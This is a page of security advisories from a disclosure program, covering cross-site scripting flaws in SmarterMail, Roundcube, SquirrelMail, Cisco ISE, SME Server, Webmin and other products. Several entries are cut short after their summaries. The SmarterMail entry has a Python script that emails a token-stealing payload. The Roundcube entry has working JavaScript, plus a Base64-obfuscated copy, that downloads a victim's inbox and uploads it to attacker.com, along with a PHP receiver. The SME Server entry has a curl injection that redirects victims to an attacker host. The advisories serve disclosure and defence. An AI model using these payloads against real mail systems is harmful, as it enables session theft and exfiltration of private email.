SSD Advisory – SmarterMail XSS

TL;DR

Find out how a cross site scripting vulnerability in SmarterMail allows remote attackers to obtain the JWT token used to authenticate the user.

Vulnerability Summary

SmarterMail offers “all of the same features as Microsoft Exchange, but at a FRACTION of the cost. Unlike Exchange, features like audio and video group chat, and Team Workspaces for team meetings and group collaboration are included at no extra charge”.

SmarterMail is “the only on-prem email alternative to Exchange for web hosts, ISPs, small businesses and enterprises that want Exchange-level functionality, but without the high costs associated with Exchange”.

SmarterMail does not properly encode/sanitise/escape the message contents when the email is sent. As a result, it is possible to steal the victim’s JWT token which is responsible for every operation on the server.

CVE

CVE-2021-35519

Credit

An independent security researcher, honeydew2, has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

SmarterMail Build 7817

Vendor Response

The vendor has released a patch, SmarterMail Build 7845, which resolves the issue.

Vulnerability Analysis

SmarterMail renders incoming HTML emails for users automatically – the HTML renderer does not properly filter incoming HTML tags for malicious content.

While there is an attempt to filter out malicious <script> tags, if these tags are delimitered by “/” rather than a ” ” (space), the HTML renderer will process the HTML and show it to the user, for example sending a victim this HTML:

<img/src/onerror=alert(sessionStorage.getItem('token'))>

Will result in the HTML renderer returning to the user this HTML:

<img src onerror=alert(sessionStorage.getItem('token'))>

Which will show inside an alert the SmarterMail’s sessionStorage token, which is used to authenticate the user against the product.

Exploit

#!/usr/bin/python3

# Import smtplib for the actual sending function
import smtplib
from datetime import date

today = date.today()
server = "192.168.15.50"

# Import the email modules we'll need
from email.message import EmailMessage

msg = EmailMessage()

msg['Subject'] = f'Welcome to Smartermail'
msg['From'] = 'admin@smartermail-test.com'
msg['To'] = 'user1@smartermail-test.com'

msg.set_content("Welcome to smartermail, you can immediately start using it -just click on the Test email to get started")

s = smtplib.SMTP(server)
s.set_debuglevel(1)

s.send_message(msg)
s.quit()

###
msg = EmailMessage()

msg['Subject'] = f'Test email'
msg['From'] = 'admin@smartermail-test.com'
msg['To'] = 'user1@smartermail-test.com'

msg.add_alternative("<div style=\"font-family: arial; font-size: 14px;\"><div fr-original-style=\"\" style=\"box-sizing: border-box;\"><br fr-original-style=\"\" style=\"box-sizing: border-box;\"></div><div fr-original-style=\"\" style=\"box-sizing: border-box;\"><br fr-original-style=\"\" style=\"box-sizing: border-box;\"></div><div fr-original-style=\"\" style=\"box-sizing: border-box;\"><img/src/onerror=alert(sessionStorage.getItem('token'))></div></div>", subtype="html")

s = smtplib.SMTP(server)
s.set_debuglevel(1)

s.send_message(msg)

s.quit()

Demo

SSD Advisory – Roundcube Incoming Emails Stored XSS

TL;DR

Find out how we exploited Roundcube webmail application and crafted an email containing malicious HTML that execute arbitrary JavaScript code in the context of the vulnerable user’s inbox.

Vulnerability Summary

Roundcube webmail is a browser-based multilingual IMAP client with an application-like user interface.
An input sanitization vulnerability in Roundcube can be exploited to perform a stored cross-site scripting (XSS) attacks.

CVE

CVE-2020-15562

Credit

An independent Security Researcher, Andrea Cardaci, has reported this vulnerability to SSD Secure Disclosure program.

Affected Systems

Roundcube versions:
– 1.3.8
– 1.3.9
– 1.4 (current main branch)

Vendor Response

The vendor acknowledges the vulnerability and fixed it, see vendor advisory for more details: https://roundcube.net/news/2020/07/05/security-updates-1.4.7-1.3.14-and-1.2.11

Vulnerability Details

Roundcube uses a custom version of Washtml (a HTML sanitizer) to display untrusted HTML in email messages. One of the modifications adds the SVG supportsvg-support, in particular, an exception has been added in rcube_washtml.php for the svg tag to properly handle XML namespaces (dumpHtml function):

if ($tagName == 'svg') {
    $xpath = new DOMXPath($node->ownerDocument);
    foreach ($xpath->query('namespace::*') as $ns) {
        if ($ns->nodeName != 'xmlns:xml') {
            $dump .= ' ' . $ns->nodeName . '="' . $ns->nodeValue . '"';
        }
    }
}

This snippet uses an XPath query to list and add all the non-default XML namespaces of the root element of the HTML message to the svg tag as attributes. The vulnerable part here is that $ns->nodeName and $ns->nodeValue values are added to $dump without proper sanitization (e.g., htmlspecialchars).[svg-support]  Introduced in commit a1fdb205f824dee7fd42dda739f207abc85ce158.

There are a number of things to consider in order to manage to successfully inject arbitrary HTML code.

First, if the HTML message lacks the head tag (or alternatively a meta specifying the charset, in newer releases) then Roundcube appends a default preamble to the message; this is undesirable as the goal is to control the root element. (Also note that the svg tag itself cannot be the root element.)

Second, when at least one svg tag is present (and the <html string is not) the message is parsed using DOMDocument::loadXMLdom-node and that requires a valid XML document.

Finally, by taking into account that DOMDocument::loadXML decodes any HTML entity during the parsing, it is possible to use &quot; to escape the hard coded double quotes in the above snippet and &lt;/&gt; to escape the svg element altogether.

Since the namespaces are added to the svg tag, a simple way to exploit this vulnerability is to use the onload event:

<head xmlns="" onload="alert(document.domain)"><svg></svg></head>

The resulting HTML is:

<svg xmlns="" onload="alert(document.domain)" />

It is likewise possible to escape the svg tag entirely and inject a script tag:

<head xmlns=""><script>alert(document.domain)</script>"><svg></svg></head>

The resulting HTML is:

<svg xmlns=""><script>alert(document.domain)</script>" />

[dom-node]  In the above snippet $node is an instance of DOMNode.

Exploit

Possibly one of the most effective ways to demonstrate the impact of this vulnerability is to exploit the zipdownload plugin (enabled by default) to fetch the whole inboxuid as a zipped MBOX file then upload it to a web server controlled by the attacker via a POST request:

(async () => {
    const uploadEndpoint = 'http://attacker.com:8080/upload.php';

    // download the whole inbox as a zip file
    const response = await fetch('?_task=mail&_action=plugin.zipdownload.messages', {
        method: 'POST',
        credentials: 'include',
        headers: {
            'content-type': 'application/x-www-form-urlencoded'
        },
        body: `_mbox=INBOX&_uid=*&_mode=mbox&_token=${rcmail.env.request_token}`
    });

    // prepare the upload form
    const formData = new FormData();
    const inboxZip = await response.blob();
    formData.append('inbox', inboxZip, 'INBOX.mbox.zip');

    // send the zip file to the attacker
    return fetch(uploadEndpoint, {
        method: 'POST',
        mode: 'no-cors',
        body: formData
    });
})();

To avoid using HTML entities for & it is possible to encode everything with Base64. The final payload becomes:

<head xmlns="" onload="eval(atob('KGFzeW5jKCk9Pntjb25zdCB1cGxvYWRFbmRwb2ludD0iaHR0cDovL2F0dGFja2VyLmNvbTo4MDgwL3VwbG9hZC5waHAiO2NvbnN0IHJlc3BvbnNlPWF3YWl0IGZldGNoKCI/X3Rhc2s9bWFpbCZfYWN0aW9uPXBsdWdpbi56aXBkb3dubG9hZC5tZXNzYWdlcyIse21ldGhvZDoiUE9TVCIsY3JlZGVudGlhbHM6ImluY2x1ZGUiLGhlYWRlcnM6eyJjb250ZW50LXR5cGUiOiJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQifSxib2R5OmBfbWJveD1JTkJPWCZfdWlkPSomX21vZGU9bWJveCZfdG9rZW49JHtyY21haWwuZW52LnJlcXVlc3RfdG9rZW59YH0pO2NvbnN0IGZvcm1EYXRhPW5ldyBGb3JtRGF0YTtjb25zdCBpbmJveFppcD1hd2FpdCByZXNwb25zZS5ibG9iKCk7Zm9ybURhdGEuYXBwZW5kKCJpbmJveCIsaW5ib3haaXAsIklOQk9YLm1ib3guemlwIik7cmV0dXJuIGZldGNoKHVwbG9hZEVuZHBvaW50LHttZXRob2Q6IlBPU1QiLG1vZGU6Im5vLWNvcnMiLGJvZHk6Zm9ybURhdGF9KX0pKCk7Cg=='))"><svg></svg></head>

The POST request can be easily received by the built-in PHP web server, for example create an upload.php file with:

<?php<br>$file = $_FILES['inbox'];<br>move_uploaded_file($file['tmp_name'], $file['name']);

Then start the server with:

$ php -S 0.0.0.0:8080

If the XSS is successfully triggered then a INBOX.mbox.zip file is created in the current directory.[uid]  The _uid POST field can also be an array thus allowing to exfiltrate the inbox in chunks.

Demo

SquirrelMail – Incoming e-Mails Stored XSS

Abstract
SquirrelMail allows to display HTML messages provided that non-safe fragments are redacted. An input sanitization vulnerability that can be exploited to perform stored cross-site scripting (XSS) attacks has been discovered.
A remote attacker can send a specially crafted e-mail containing malicious HTML and execute arbitrary JavaScript code in the context of the vulnerable webmail interface when the user displays the message. This basically grants the attacker the same privileges of the authenticated victim, in particular this enables to (among other things): send e-mail messages on the behalf of the victim, fetch conversations from folders, delete or otherwise manage messages, log the victim out of SquirrelMail, etc.
It is likely that even prior versions are affected since this does not appear to be a regression but merely an insufficient implementation.
Details
The HTML sanitizer uses a blacklist approach based on tag and attributes names to recognize potentially dangerous HTML code and decide how to fix it, for example, attributes starting with on are removed as they usually represent events. In particular, the <script> element is deleted and the href attribute can only assume certain schemes (e.g., not javascript:) otherwise it is replaced with a void image URL.
It is possible to bypass these checks by using the SVG counterpart of the <a> and <script> elements. This variant exposes the href attribute as part of the xlink namespace (for the latter it allows to specify the resource containing the script code) therefore it can be accessed with xlink:href which is ignored by SquirrelMail. Moreover, in this context <script> can be self-closing and the lack of closing tag is enough to deceive the sanitizer.
Two methods have been devised, to maximize the chances of success it may be advisable to employ both.
Credit
An independent security researcher, Andrea Cardaci, has reported this vulnerability to SSD Secure Disclosure program.
Affected versions
SquirrelMail version 1.4.23 (SM-1_4-STABLE @ r14746)
SquirrelMail version 1.5.2 (trunk @ r14747)

No user action required
This solution only works with Firefox and Edge [1] and requires no additional interaction from of the user:

(more…)

SSD Advisory – MDaemon Mail Server Multiple XSS Vulnerabilities

Vulnerabilities Summary
The following advisory describes two XSS vulnerabilities found in MDaemon Mail Server which lets attackers send emails with malicious payloads and run client side code on victim’s browsers just by opening an email.

CVE
CVE-2019-8983
CVE-2019-8984

Credit
An independent security researcher, Zhong Zhaochen, has reported this vulnerability to SSD Secure Disclosure program.

(more…)

SSD Advisory – Cisco ISE Unauthenticated XSS to Privileged RCE

Vulnerabilities Summary
Cisco Identity Services Engine (ISE) contains three vulnerabilities that when exploited allow an unauthenticated attacker to achieve root privileges and execute code remotely. The first is a Stored Cross Site Scripting file upload vulnerability that allows the attacker to upload and execute html pages on victims browser. The second is an already known vulnerability Unsafe Flex AMF Java Object Deserialization CVE-2017-5641 which we used in this exploit. The third is a Privilege Escalation via Incorrect sudo File Permissions that let local attackers run code as root.
Vendor Response
“I would like to inform you that we have assigned the CVE-ID, CVE-2018-15440 for the reported XSS vulnerability.The security advisory will be accessible after the publication date (Jan,9th 2019) at the following URL:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-ise-multi-xss”
CVE
CVE-2018-15440
Credit
An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Affected systems
Cisco Identity Services Engine version 2.4.0
Vulnerability Details
First Vulnerability: Stored Cross Site Scripting
Attack Vector: Remote
The LiveLogSettingsServlet, available at /admin/LiveLogSettingsServlet, contains a stored cross site scripting vulnerability. The doGet() HTTP request handler takes in an Action parameter as a HTTP query variable, which can be “read” or “write”.
With the “write” parameter, it calls the writeLiveLogSettings() function which then takes several query string variables, such as Columns, Rows, Refresh_rate and Time_period. The content of these query string variables is then written to /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt, and the server responds with a 200 OK.
These parameters are not validated, and can contain any text. When the Action parameter equals “read”, the servlet will read the /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt file and display it back to the user with the Content-Type “text/html”, causing whatever was written to that file to be rendered and executed by the browser. To mount a simple attack, we can send the following request:

(more…)

SSD Advisory – SME Server Unauthenticated XSS To Privileged Remote Code Execution

Vulnerabilities Summary
The following advisory describes a vulnerability in SME Server 9.2, which lets an unauthenticated attackers perform XSS attack that leads to remote code execution as root. SME Server is a Linux distribution for small and medium enterprises by Koozali foundation.
CVE
CVE-2018-18072
Credit
An independent security researcher, Karn Ganeshen has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Affected systems
SME Server 9.2
Vendor Response
Fixed in phpki-0.82-17.el6.sme, phpki-0.82-18.el6.sme, phpki-0.82-19.el6.sme
Vulnerability Details
Software for the SME Server is packaged using RPM Package Manager (RPM) system. Existing packages from CentOS and other third-party developers are used. The SME Server uses packages from the open source community. Packages are called as contribs. Each contrib adds a specific functionality to the SME server  deployment. Once a contrib is installed, the corresponding Menu or web panel is added to the SME HTTP management portal. The default admin user has access to all contrib Menus. admin can create a new user and assign access of specific web panels (functionality) to the user. The user can, then, view, access and administer only those specific web panels.
The vulnerable components are the “Certificate Management” & “Advanced Web Statistics”, Which are vulnerable to Cross-Site Scripting & Cross-Site Request Forgery.
For the next demonstration , the Attackers IP is 192.168.1.2 and the SME Server IP 192.168.1.109.
The exploitation starts with the contrib – PHPKI – smeserver-phpki. This contrib provides a Certificate Management functionality. The administrator adds new certificates, which the users can download and set up in their browsers. The Certificate Management portal is accessible at https://<SME Server IP>/phpki/.
It should look like this:

All users can access this without any authentication. The portal provides a Search function where a user can search for existing certificates.
Exploit
1) Reflected XSS [Pre-Auth] https://192.168.1.109/phpki/search.php/”><script>alert(“xss-phpki”)</script> . We can now see that this component is vulnerable to XSS.

Now lets arm the payload: We will inject the following payload: “><script>document.location=”http://192.168.1.2/ssd.html”</script>
Issue the following request: curl ‘https://192.168.1.109/phpki/search.php/”><script>document.location=”http://192.168.1.2/ssd.html”</script>’ –insecure This payload is injected in the back-end (Stored-XSS) and used by another contrib, Awstats.
2) Start a web server on Attacker IP to serve our evil form – ssd.html

(more…)

SSD安全公告-Endian防火墙从存储型XSS到远程命令执行

漏洞概要
以下安全公告描述了在Endian防火墙5.0.3版本中存在的一个存储型XSS漏洞,成功利用该漏洞可造成远程代码执行。
Endian防火墙是一个“专注Linux安全的发行版本,,它是一个独立的,统一的安全管理操作系统。 Endian防火墙基于强化的Linux操作系统。”
漏洞提交者
一位独立的安全研究者向 Beyond Security 的 SSD 报告了该漏洞
厂商响应
厂商已经发布针对该漏洞的补丁。获取更多信息: https://help.endian.com/hc/en-us/articles/115012996087
(more…)

SSD Advisory – Endian Firewall Stored From XSS to Remote Command Execution

Vulnerability Summary
The following advisory describes a stored cross site scripting that can be used to trigger remote code execution in Endian Firewall version 5.0.3.
Endian Firewall is a “turnkey Linux security distribution, which is an independent, unified security management operating system. The Endian Firewall is based on a hardened Linux operating system.”
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
Endian has released patches to address this vulnerability.
For more information: https://help.endian.com/hc/en-us/articles/115012996087
(more…)

SSD Advisory – HPE Baseline Smart Gig SFP 24 Switch Pre-authentication Stored XSS

Vulnerability Summary
The following advisory describes an unauthenticated stored XSS in the HPE Baseline Smart Gig SFP 24 / 3Com Baseline Switch 2924 SFP Plus Switch.
The vulnerability affect versions:

  • Software Version: 01.00.10
  • Boot version: 1.0.0.14
  • Hardware Version: 01.01.0a

“On April 12, 2010, Hewlett-Packard completed the acquisition of 3Com. Since the acquisition, 3Com has been fully absorbed by Hewlett-Packard and no longer exists as a separate entity.”
Every 3Com model changed its identification number. The new HP name/ID number for this switch is “HP Baseline Smart Gig SFP 24 – JE002A”
There is no other difference between 3CBLSG24 and JE002A.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
HPE was informed of the vulnerability, their response was: “This issue is not going to be resolved. We had hoped resources could be found to address the issue, but the business determined that the product is out of support life. It’s been this way for several years. We hoped we could communicate something to customers about the product, but this switch is truly not supported in that way either.”
(more…)

SSD Advisory – Webmin Multiple Vulnerabilities

Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin version 1.850
Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely. See the standard modules page for a list of all the functions built into Webmin.”
The vulnerabilities found are:

  • XSS vulnerability that leads to Remote Code Execution
  • CSRF Schedule arbitrary commands
  • Server Side Request Forgery

Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
Update 1
CVE:

  • CVE-2017-15644
  • CVE-2017-15645
  • CVE-2017-15646

The vendor has released patches to address these vulnerabilities.
For more information: https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9 and http://www.webmin.com/security.html
(more…)